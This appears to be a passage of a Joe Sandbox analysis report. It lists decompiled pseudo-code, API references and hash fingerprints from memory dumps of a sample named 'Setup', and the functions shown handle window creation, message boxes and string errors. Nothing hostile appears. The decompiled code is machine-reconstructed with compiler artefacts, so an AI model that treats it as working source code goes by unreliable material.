                                                                                                                                                              						goto L35;
                                                                                                                                                              					case 2:
                                                                                                                                                              						__eax = _a12;
                                                                                                                                                              						__ecx =  *(_a12 + 0xc);
                                                                                                                                                              						_v8 = __ecx;
                                                                                                                                                              						goto L35;
                                                                                                                                                              					case 3:
                                                                                                                                                              						goto L33;
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c24c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c31c
                                                                                                                                                              0x0040c31f
                                                                                                                                                              0x0040c322
                                                                                                                                                              0x0040c328
                                                                                                                                                              0x0040c335
                                                                                                                                                              0x0040c338
                                                                                                                                                              0x0040c344
                                                                                                                                                              0x0040c346
                                                                                                                                                              0x0040c349
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32d
                                                                                                                                                              0x0040c330
                                                                                                                                                              0x0040c330
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c351
                                                                                                                                                              0x0040c354
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c35d
                                                                                                                                                              0x0040c35f
                                                                                                                                                              0x0040c362
                                                                                                                                                              0x0040c366
                                                                                                                                                              0x0040c36a
                                                                                                                                                              0x0040c36d
                                                                                                                                                              0x0040c375
                                                                                                                                                              0x0040c37c
                                                                                                                                                              0x0040c37c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c38c
                                                                                                                                                              0x0040c38f
                                                                                                                                                              0x0040c392
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(00000000,?,?,?), ref: 0040C43F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID: N
                                                                                                                                                              • API String ID: 3850602802-1130791706
                                                                                                                                                              • Opcode ID: 7f2c5bcd31de584d4d0be3587bf2bf2be01db85bb1ee8956a34027b5554130ec
                                                                                                                                                              • Instruction ID: a8dd4be5facf2ee9d7f11e99f2b5bce13c937c67a52612d1dba8838cde38d3c2
                                                                                                                                                              • Opcode Fuzzy Hash: 7f2c5bcd31de584d4d0be3587bf2bf2be01db85bb1ee8956a34027b5554130ec
                                                                                                                                                              • Instruction Fuzzy Hash: 1471D9B4910209DFDF18DF98C994AEEB7B1BF48304F24826EE811B7381D7389951DB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004F72A0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				signed int _v53;
                                                                                                                                                              				char _v54;
                                                                                                                                                              				char _v84;
                                                                                                                                                              				struct HWND__* _v88;
                                                                                                                                                              				struct HWND__* _v92;
                                                                                                                                                              				struct HWND__* _v96;
                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				signed int _t44;
                                                                                                                                                              				struct HWND__* _t46;
                                                                                                                                                              				signed int _t48;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				signed int _t83;
                                                                                                                                                              
                                                                                                                                                              				_t82 = __esi;
                                                                                                                                                              				_t81 = __edi;
                                                                                                                                                              				_t78 = __edx;
                                                                                                                                                              				_t61 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5106dc);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t38 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t39 = _t38 ^ _t83;
                                                                                                                                                              				_v20 = _t39;
                                                                                                                                                              				_push(_t39);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					E004175C0(E00434050( &_v54));
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t44 = E004F6FA0(__eflags, _a4,  &_v52);
                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                              					if(_t44 != 0) {
                                                                                                                                                              						_v92 = 1;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_t46 = _v92;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t48 = E004C5660(0x54, 0);
                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                              						_v53 =  ~( ~_t48);
                                                                                                                                                              						__eflags = _v53 & 0x000000ff;
                                                                                                                                                              						if((_v53 & 0x000000ff) != 0) {
                                                                                                                                                              							MessageBoxW(0, E00416A30( &_v48), L"JSError", 0x30);
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  &_v52;
                                                                                                                                                              						if( &_v52 == 0) {
                                                                                                                                                              							_v96 = 0;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v96 =  &_v52 + 4;
                                                                                                                                                              						}
                                                                                                                                                              						_v100 = E00409760( &_v84, L"JSError: ", _v96);
                                                                                                                                                              						_v104 = _v100;
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						_t78 = _v104;
                                                                                                                                                              						E00409880( &_v52, __eflags, _v104);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004178C0( &_v84);
                                                                                                                                                              						E004162C0(0xc0b50001, E00416A30( &_v48));
                                                                                                                                                              						_v88 = 0;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_t46 = _v88;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t46 = 0x80070057;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t46, _t61, _v20 ^ _t83, _t78, _t81, _t82);
                                                                                                                                                              			}

























                                                                                                                                                              0x004f7337
                                                                                                                                                              0x004f7340
                                                                                                                                                              0x004f7342
                                                                                                                                                              0x004f734f
                                                                                                                                                              0x004f7344
                                                                                                                                                              0x004f734a
                                                                                                                                                              0x004f734a
                                                                                                                                                              0x004f736b
                                                                                                                                                              0x004f7371
                                                                                                                                                              0x004f7374
                                                                                                                                                              0x004f7378
                                                                                                                                                              0x004f737f
                                                                                                                                                              0x004f7384
                                                                                                                                                              0x004f738b
                                                                                                                                                              0x004f739e
                                                                                                                                                              0x004f73a6
                                                                                                                                                              0x004f73ad
                                                                                                                                                              0x004f73b7
                                                                                                                                                              0x004f73bc
                                                                                                                                                              0x004f73bc
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f72ce
                                                                                                                                                              0x004f73dd
                                                                                                                                                              0x004f73f2

                                                                                                                                                              APIs
                                                                                                                                                              • MessageBoxW.USER32(00000000,00000000,JSError,00000030), ref: 004F7337
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message
                                                                                                                                                              • String ID: JSError$JSError:
                                                                                                                                                              • API String ID: 2030045667-3168168555
                                                                                                                                                              • Opcode ID: e9f62c1a29abfb43f4d258fa65763e65ab643698d7a395236dd84a9f79b53bb8
                                                                                                                                                              • Instruction ID: cf006f8e730ff20441fb699ad4947263adb02b852262e9c3252fa3747a375cb8
                                                                                                                                                              • Opcode Fuzzy Hash: e9f62c1a29abfb43f4d258fa65763e65ab643698d7a395236dd84a9f79b53bb8
                                                                                                                                                              • Instruction Fuzzy Hash: 15416C70D1425CEBDB04DFE5DD41BEEB7B4AF10714F10812EE916AB281EB786A08CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004142F0(struct HMENU__* __ecx, struct HWND__* _a4, char _a8, WCHAR* _a12, signed int _a16, long _a20, struct HMENU__* _a24, signed int _a28, void* _a32) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				struct HMENU__* _v16;
                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                              
                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v12 = E00416FC0(_v16 + 8, 0, 0);
                                                                                                                                                              				if(_v12 != 0) {
                                                                                                                                                              					if((_a28 & 0x0000ffff) != 0) {
                                                                                                                                                              						E004142D0(0x5bc84c, _v16 + 8, _v16);
                                                                                                                                                              						if(_a24 == 0 && (_a16 & 0x40000000) != 0) {
                                                                                                                                                              							_a24 = _v16;
                                                                                                                                                              						}
                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                              							_a8 = 0x563b60;
                                                                                                                                                              						}
                                                                                                                                                              						_t37 = E004150F0(0x5bc878);
                                                                                                                                                              						_t17 =  &_a8; // 0x563b60
                                                                                                                                                              						_t18 =  &_a8; // 0x563b60
                                                                                                                                                              						_t21 =  &_a8; // 0x563b60
                                                                                                                                                              						_t22 =  &_a8; // 0x563b60
                                                                                                                                                              						_t24 =  &_a8; // 0x563b60
                                                                                                                                                              						_t26 =  &_a8; // 0x563b60
                                                                                                                                                              						_v8 = CreateWindowExW(_a20, _a28 & 0x0000ffff, _a12, _a16,  *( *_t26),  *( *_t24 + 4),  *((intOrPtr*)( *_t21 + 8)) -  *((intOrPtr*)( *_t22)),  *((intOrPtr*)( *_t17 + 0xc)) -  *((intOrPtr*)( *_t18 + 4)), _a4, _a24, _t37, _a32);
                                                                                                                                                              						do {
                                                                                                                                                              						} while (0 != 0 || 0 != 0);
                                                                                                                                                              						return _v8;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				SetLastError(0xe);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(0000000E,00000000,00000000,?), ref: 0041431B
                                                                                                                                                              • CreateWindowExW.USER32 ref: 004143BE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLastWindow
                                                                                                                                                              • String ID: `;V
                                                                                                                                                              • API String ID: 3732789607-153881035
                                                                                                                                                              • Opcode ID: bc5481094147c5028f869b2af17f56e0ed4df777ac421fbe60ea03ec0394619d
                                                                                                                                                              • Instruction ID: f4675ab21f95ec9b4676b29afb7d41b1f0b68bab34476891cf68291ecf48fe51
                                                                                                                                                              • Opcode Fuzzy Hash: bc5481094147c5028f869b2af17f56e0ed4df777ac421fbe60ea03ec0394619d
                                                                                                                                                              • Instruction Fuzzy Hash: F931E875600109ABCB04CFA9D890BEEB7B5FB98305F10C15AFD199B344D638E991CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00414570(intOrPtr* __ecx, void* __edi, void* __esi, char _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				intOrPtr* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              
                                                                                                                                                              				_t86 = __esi;
                                                                                                                                                              				_t85 = __edi;
                                                                                                                                                              				_v20 = __ecx;
                                                                                                                                                              				if( *(_v20 + 4) !=  *(_v20 + 8)) {
                                                                                                                                                              					L17:
                                                                                                                                                              					_t38 =  &_a4; // 0x412f7d
                                                                                                                                                              					E004144E0(_v20,  *(_v20 + 4),  *_t38);
                                                                                                                                                              					 *(_v20 + 4) =  *(_v20 + 4) + 1;
                                                                                                                                                              					return 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L1;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L1:
                                                                                                                                                              					_t7 =  &_a4; // 0x412f7d
                                                                                                                                                              					if( *_t7 <  *_v20 || _a4 >=  *_v20 +  *(_v20 + 8) * 2) {
                                                                                                                                                              						_v24 = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v24 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v24;
                                                                                                                                                              					if(_v16 == 0) {
                                                                                                                                                              						E00417470(0x80004005);
                                                                                                                                                              					}
                                                                                                                                                              				} while (0 != 0);
                                                                                                                                                              				if( *(_v20 + 8) != 0) {
                                                                                                                                                              					_v28 =  *(_v20 + 4) << 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v28 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				_v12 = _v28;
                                                                                                                                                              				if(_v12 < 0 || _v12 > 0x3fffffff) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v8 = E00451CF3(_t85, _t86,  *_v20, _v12, 2);
                                                                                                                                                              					if(_v8 != 0) {
                                                                                                                                                              						 *(_v20 + 8) = _v12;
                                                                                                                                                              						 *_v20 = _v8;
                                                                                                                                                              						goto L17;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              			}












                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __recalloc
                                                                                                                                                              • String ID: }/A$}/A
                                                                                                                                                              • API String ID: 492097735-3808699022
                                                                                                                                                              • Opcode ID: ed2bd2c41bf67b89da7877967f424ab82685def55af695b61b3782420c1fa0cc
                                                                                                                                                              • Instruction ID: 24197290a2c52d798ca412b7abbdb8b798166c6d33e6234649ae13cb00557ef3
                                                                                                                                                              • Opcode Fuzzy Hash: ed2bd2c41bf67b89da7877967f424ab82685def55af695b61b3782420c1fa0cc
                                                                                                                                                              • Instruction Fuzzy Hash: 9031EAB4A00219EFCB04DF94C580AEEB7B2FF89308F20855AD915AB351D739AD81CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E004F16B0(intOrPtr __ecx) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v25;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				void* _t41;
                                                                                                                                                              				struct HWND__* _t44;
                                                                                                                                                              				intOrPtr _t48;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50c858);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t28 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t28 ^ _t71);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v40 = __ecx;
                                                                                                                                                              				E00414C90();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if((E004F06E0(_v40, L"setupProgress", E00434050( &_v24)) & 0x000000ff) != 0) {
                                                                                                                                                              					E00414C90();
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0x5c))))))(_v40 + 0x5c, E00434050( &_v20));
                                                                                                                                                              					_t39 = E0041D530( &_v20);
                                                                                                                                                              					__eflags = _v40 + 0x84;
                                                                                                                                                              					_t41 = E0041D530(E00416210(_v40 + 0x84,  &_v32));
                                                                                                                                                              					E004E6ED0(E004049B0(), __eflags, _t41, _t39);
                                                                                                                                                              					_t44 =  *0x5bdd34; // 0x80078
                                                                                                                                                              					PostMessageW(_t44, 0x402, 0, 0);
                                                                                                                                                              					_v33 = 1;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t48 = _v33;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v25 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t48 = _v25;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t48;
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F1768
                                                                                                                                                              • PostMessageW.USER32(00080078,00000402,00000000,00000000), ref: 004F1783
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ImmortalizeMessagePost
                                                                                                                                                              • String ID: setupProgress
                                                                                                                                                              • API String ID: 2625385972-2832641745
                                                                                                                                                              • Opcode ID: 3416b2c64cff4d0a2fdd0e3e7097e33905e81d981fb11a63ee0862c9b060d800
                                                                                                                                                              • Instruction ID: 5efc7772feee3f8601489b69cf35665293bf3e2b9feb4c2702f4ee32e789bbc5
                                                                                                                                                              • Opcode Fuzzy Hash: 3416b2c64cff4d0a2fdd0e3e7097e33905e81d981fb11a63ee0862c9b060d800
                                                                                                                                                              • Instruction Fuzzy Hash: 4D319170D00249ABCB08EFE5D952BFEB7B4AF14314F10419EE512772D1DB782A08CBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0040D250(intOrPtr __ebx, intOrPtr __ecx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				signed int _t8;
                                                                                                                                                              				signed int _t14;
                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                              				_t26 = __edi;
                                                                                                                                                              				_t25 = __edx;
                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                              				_t8 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v8 = _t8 ^ _t28;
                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                              				if(GetClassNameW(E0041D530(E00416210(_v32,  &_v28)),  &_v24, 8) != 0) {
                                                                                                                                                              					_t25 =  &_v24;
                                                                                                                                                              					_t14 = lstrcmpW( &_v24, L"#32770");
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_t16 =  ~_t14 + 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t16 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_t16, _t18, _v8 ^ _t28, _t25, _t26, _t27);
                                                                                                                                                              			}














                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00416210: GetParent.USER32(-00000084), ref: 0041621D
                                                                                                                                                              • GetClassNameW.USER32 ref: 0040D27D
                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 0040D294
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassNameParentlstrcmp
                                                                                                                                                              • String ID: #32770
                                                                                                                                                              • API String ID: 3513268407-463685578
                                                                                                                                                              • Opcode ID: e2890b091a2eff4d2f0aae01bf3e70ddc12ed54ec836df256570ebb502a240df
                                                                                                                                                              • Instruction ID: 1690f334c6585ecb6f88071bad41f21d97651b8226febb9f9509e1ae735e5502
                                                                                                                                                              • Opcode Fuzzy Hash: e2890b091a2eff4d2f0aae01bf3e70ddc12ed54ec836df256570ebb502a240df
                                                                                                                                                              • Instruction Fuzzy Hash: 4BF09030E00209ABDB00EFF5D9469FE77B8AB14304B50496EA406E7280FA38A9099B55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E0044F642(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				signed int _v4;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              
                                                                                                                                                              				_t56 = __edi;
                                                                                                                                                              				_t45 = __ebx;
                                                                                                                                                              				_push(0x44);
                                                                                                                                                              				E00456E7E(0x505398, __ebx, __edi, __esi);
                                                                                                                                                              				E004134D0( &_v40, "string too long");
                                                                                                                                                              				_v4 = _v4 & 0x00000000;
                                                                                                                                                              				E00413D50( &_v40);
                                                                                                                                                              				E00456A4C( &_v80, 0x544b50);
                                                                                                                                                              				asm("int3");
                                                                                                                                                              				_push(0x44);
                                                                                                                                                              				E00456E7E(0x505398, __ebx, __edi, __esi);
                                                                                                                                                              				E004134D0( &_v40, "invalid string position");
                                                                                                                                                              				_v4 = _v4 & 0x00000000;
                                                                                                                                                              				E00413210( &_v40);
                                                                                                                                                              				E00456A4C( &_v80, 0x544adc);
                                                                                                                                                              				asm("int3");
                                                                                                                                                              				_t61 = _t59;
                                                                                                                                                              				_push(_t61);
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t37 = E0044FBD9(_t45, _t55, _t56, _v0); // executed
                                                                                                                                                              					if(_t37 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t38 = E00456FFC(_v0);
                                                                                                                                                              					__eflags = _t38;
                                                                                                                                                              					if(_t38 == 0) {
                                                                                                                                                              						__eflags =  *0x5bc914 & 0x00000001;
                                                                                                                                                              						if(( *0x5bc914 & 0x00000001) == 0) {
                                                                                                                                                              							 *0x5bc914 =  *0x5bc914 | 0x00000001;
                                                                                                                                                              							__eflags =  *0x5bc914;
                                                                                                                                                              							E0044F754(0x5bc908);
                                                                                                                                                              							E0044FAE5( *0x5bc914, 0x51a041);
                                                                                                                                                              						}
                                                                                                                                                              						E00417C20(0x5bc908);
                                                                                                                                                              						E00456A4C( &_v20, 0x544b88);
                                                                                                                                                              						asm("int3");
                                                                                                                                                              						_t42 =  &_v20;
